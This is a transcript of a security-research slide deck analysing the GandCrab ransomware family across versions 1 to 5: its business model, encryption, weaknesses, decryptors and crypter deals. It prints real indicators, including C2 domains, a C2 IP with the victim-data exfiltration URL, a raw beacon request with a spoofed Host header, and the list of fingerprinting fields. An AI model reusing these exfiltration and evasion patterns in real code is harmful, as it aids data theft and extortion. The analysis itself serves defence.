GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain...

GANDCRAB MENTALITY

Jasper Manuel Joie Salvio

GandCrab Ransomware-as-a-Service

Images by @CryptoInsane

Ransomware-as-a-Service (RaaS) • Affiliate scheme 60-40 or 70-30 • Speed, reliability, customization • Includes FUD, support, update

• Panel and Admin websites in TOR network • Must not target members of Russian

Commonwealth (AM, AZ, BY, RU, KZ, etc.)

Execution Flow

Encrypt Files

Contact C2

Delete Shadow Copies

Generate Keys

Terminate Processes

Collect Victim Information

Elevate Privilege

Ransom Note

Ransom Note Payment Page

Ransom Note and Payment Page

Jan Jul Feb Mar Jun Sep Oct Apr May Aug Nov Dec

GandCrab v1

v1

• First to use only DASH ($200-$1200) • .GDCB extension / GDCB-DECRYPT.txt

• .bit TLD for C2

• Uses RSA-2048/AES-CBC C2 domains

• gandcrab.bit • bleepingcomputer.bit • nomoreransom.bit • esetnod32.bit • emsisoft.bit

Vectors • RIG Exploit Kit • GRANDSOFT Exploit Kit • SPAM

Internal Versions • 1.0 • 1.1 • 2.1 • 2.1r

nslookup .exe <domain> a.dnspod.com

• 2.2r • 2.3r • 2.3.1r

Encrypted File Structure

Encrypted File Content

AES Key Encrypted with RSA

GandCrab v1 Weaknesses • Hard-coded RC4 key for victim info

Parameter Description

action always 'call' ip victim IP address pc_user username

pc_group domain name the machine is under pc_lang locale (e.g. en-US)

pc-keyb 1=Russian, 0=non-Russian

os_major Operating System (e.g. Windows 7 Ultimate)

os_bit Operating System Architecture (e.g. x64, x86, ARM ). ransom_id Roughly based on machine's root volume serial number hdd Information of all drives [<drive_letter>:_<drive_type>_<free_space>] pub_key RSA Public Key

priv_key RSA Private Key

version internal version hard-coded in the binary

Gathered Victim Info

Raw Victim Info

POST to http://<resolved-IP>/curl.php?token=<aff_id>

http://92.53.66.11/curl.php?token=1019

GandCrab v1 Weaknesses

RC4 Key

Encrypt data with RC4

GandCrab v1 Weaknesses • CRYPT_VERIFYCONTEXT flag not set

CRYPT_VERIFYCONTEXT Flag not set

Function to generate RSA keys

Generated private key Stored locally


GandCrab v1

Decryptor Released

• Feb.28 , Romanian Police released a decryption tool for v1

• 50,000 victims in a month • $300k - $600k estimated

payments • Mostly US and UK


• Payment page was compromised

• GandCrab v2 will be released soon

• Fired the web developer

• “Fortified” their infrastructures

GandCrab v1

Decryptor Released

GandCrab breach announcement


GandCrab v2

v2

C2 domains • gdcb.bit • emsisoft.bit • gandcrab.bit • politiaromana.bit • malwarehunterteam.bit

• .CRAB extension / CRAB-DECRYPT.txt

• Core payload is now a DLL • Added Info parameters:

• id • subid

• Fake host header: bitdefender.com

Internal Versions

• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1

GandCrab v2 POST /loey?lfeighss=oa&eas=fai HTTP/1.1 Host: bitdefender.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Length: 5880 Cache-Control: no-cache EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…

Host: bitdefender.com

CRC32 CRC32

Initial crc = 0x29a (666)

Pseudo-random RC4 Key

• Pseudo-random RC4 key to encrypt victim info

“fowge?eiplei=deoresc” “europol” C10A57D3europol

RC4 Key

POST victim info to http://<resolved-IP>/<pseudo-random string>

http://92.53.66.11/fowge?eiplei=deoresc

Fixed CRYPT Flag

Function to generate RSA keys


GandCrab v2.1

• Fake host header: ahnlab.com C2 domains

• ransomware.bit • zonealarm.bit

Internal Versions • 2.3.1 • 2.3.2 • 3.0.0

v2.1

GandCrab 2.1 Ransom Note


GandCrab v3 • Changes wallpaper

• Fake host header: yahoo.com

• Adds autorun to HKLM for admin users

C2 domains • carder.bit • ransomware.bit

Internal Versions • 3.0.0 • 3.0.1

v3

GandCrab Changes Wallpaper


GandCrab v3 Bug Unintentional “Lock Screen” on Windows 7 OS upon reboot

v3


GandCrab v4 • Switches to RSA-Salsa20 encryption algorithm

• Encrypts offline

• Encrypts Network Shares

• Sandbox evasions (removed later)

• Anti-disassembly

• Removed wallpaper change

• Major code structure makeover

v4

Internal Versions • v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3

• v4.1.2(new variant) • v4.2 • v4.2.1 • v4.3 • v4.4

Victim data and key in ransom note

Encrypted File Structure

Encrypted File Content

Salsa20 Key Encrypted with RSA Public Key

Keys in the Ransom Note

32-byte Salsa20 Key

RSA-2058 Private Key

Also stored in: HKCU\Software\keys_data\data\private

Encrypted Keys

RSA KEY Public Private

Salsa20 Key

RSA-2058 Private Key

(Encrypted with Salsa20)

SALSA20

Private

32-byte Salsa20 Key (Encrypted with RSA)

RSA

Salsa20 Key

GandCrab v4 Timeline

July Aug

Jul 04

v4.1 • Sends victim data

to a long list of URLs

v4.1.2 (new variant) GandCrab switches to mutex check v4.2 • Update picked up from

new 4.1.2 • Adds sandbox evasion

tricks

Jul 20

Aug 02

v4.2.1 • Removes VM evasion

function • Adds a link to POC of a

Denial-of-Service attack on Ahnlab’s AV component

v4.3 • Adds anti-disassembly trick

Vaccine v1 Ahnlab releases a vaccine based on .lock filename

Jul 13

Vaccine v2 Ahnlab releases a second version of the vaccine

Jul 18

v4.1.3 • No major

changes

v4.4 • Works as a vaccine by creating

the ransomware mutex. Did not work on win7 at first

Aug 06

Jul 17

v4.1.2 • Uses Salsa20 to generate

the .lock filename

Jul 11

v4.1.1 • No major changes

v4.0 • Salsa20/20 algorithm • Offline encryption • Encrypts network shares • Checks <8hex-chars>.lock

Jul 02 Jul 19


GandCrab v5

v5

• <5-10_random_char> extension

• Exploits used to elevate privilege • ALPC EOP Vulnerability (CVE-2018-8440) • Win32k EOP Vulnerability CVE-2018-8120

• HTML ransom note, and added support for other languages

• Wallpaper feature (in some variants)

Internal Versions • v5.0 • v5.0.1 • v5.0.2 • v5.0.3

• v5.0.4 • v5.0.5

GandCrab v5 Decryptor

• GandCrab released keys for Syrian victims • Bitdefender released free decryptor for versions v1, v4, v5 (5.0.1-5.0.4) • Decryptor does not work on v5.0.5, just after a day

Post of Syrian key release

Bitdefender releases free decryptor

Crypter partnership • GandCrab partners with NTCrypt for a crypter service • $100 (one-time stub) $350 (two stubs/week)

GandCrab announces “Crypt Competition”

NTCrypt wins the deal

Conclusion

• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.

• Try to compensate the not so advance malware with quick releases of new variants.

• Are very quick to react to solutions against them.

• Are loud, crazy, and very confident on what they do.

The people behind Gandcrab…

C2 Visit Count

0

50000

100000

150000

200000

250000

300000

350000 ransomware.bitpolitiaromana.bitnomoreransom.bitmalwarehunter.bitgdcb.bitgandcrab.bitesetnod32.bitemsisoft.bitbleepingcomputer.bitcarder.bit

v1 v2 V2.1 v3

Online Infection Map

0

500000

1000000

1500000

VISIT COUNT (top 10)

Move to Asian Market

• GandCrab looking for partners in a Chinese underground forum • VenusLocker campaign targeting South Korea

Sample Distribution

0

2000

4000

6000

8000

10000

12000

Samples Received Per Month (2018)

v1 v2 v3 v4 v5

References

• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/

• https://research.checkpoint.com/gandcrab-ransomware-mindset/

• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/

• Special thanks to @MarceloRivero, @ValthekOn

GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain...

Documents

Transcript of GANDCRAB - Amazon Web Services - The... · ip victim IP address pc_user username pc_group domain...